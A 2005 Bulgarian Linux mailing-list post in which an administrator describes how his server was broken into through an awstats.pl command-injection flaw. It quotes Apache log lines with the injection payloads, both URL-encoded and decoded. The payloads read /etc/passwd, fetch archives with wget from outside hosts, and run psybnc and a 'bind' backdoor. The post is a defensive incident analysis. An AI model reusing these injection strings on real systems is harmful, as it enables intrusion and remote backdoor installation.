|
lug-bg: Re: lug-bg: нещо интересно
- Subject: lug-bg: Re: lug-bg: нещо интересно
- From: "D. Dilev" <unionddd@xxxxxx>
- Date: Fri, 25 Feb 2005 00:01:04 +0200 (EET)
Благодаря на всички за отговорите. Бяха ми полезни.
Машината е пробита през awstats.
Компилирането на psybnc не е минало успешно, но tw port backdoor не е срещнал пречки.
Пеиствам Ви разследването което направих:
това е от лог файла на апач:
82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady
%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3bmake%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:18 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20h
ttp%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1"
200 13307 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:54 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2e
tar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp%3bcd%20%2ftmp%3bwget%20www%2e
petry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d
%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 2686 "-" "
-"
с по-прости думи горе се изпълнява това:
1. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;make;./psybnc;echo e_exp;%00
2. |echo ;echo b_exp;cd /tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;./psybnc;echo e_exp;%00
3. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo -------------------------;echo by Zorg of texter!;echo e_exp;%00
с други думи :
1. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
make;
./psybnc;
echo e_exp;
%00
2. |echo ;
echo b_exp;
cd /tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
./psybnc;
echo e_exp;
%00
3. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd tw;
./bind;
echo Instalam bind in /tmp;
cd /tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd rw;
./bind;
echo -------------------------;
echo by Zorg of texter!;
echo e_exp;%00
след това ги открих тук:
/var/tmp# ls -alu
-rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz
drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:06 psybnc
drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:04 tw
-rw-r--r-- 1 nobody nobody 16414 Feb 22 22:04 tw.tar.gz
-rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:06 x0b
/tmp# ls -alu
-rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz
drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:09 psybnc
drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:06 tw
-rw-r--r-- 1 nobody nobody 16414 Feb 22 22:07 tw.tar.gz
-rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:07 x0b
Поздрави
-----------------------------------------------------------------
http://gbg.bg/search - Изпробвайте още сега най-добрата българска търсачка!
============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================
|
|
|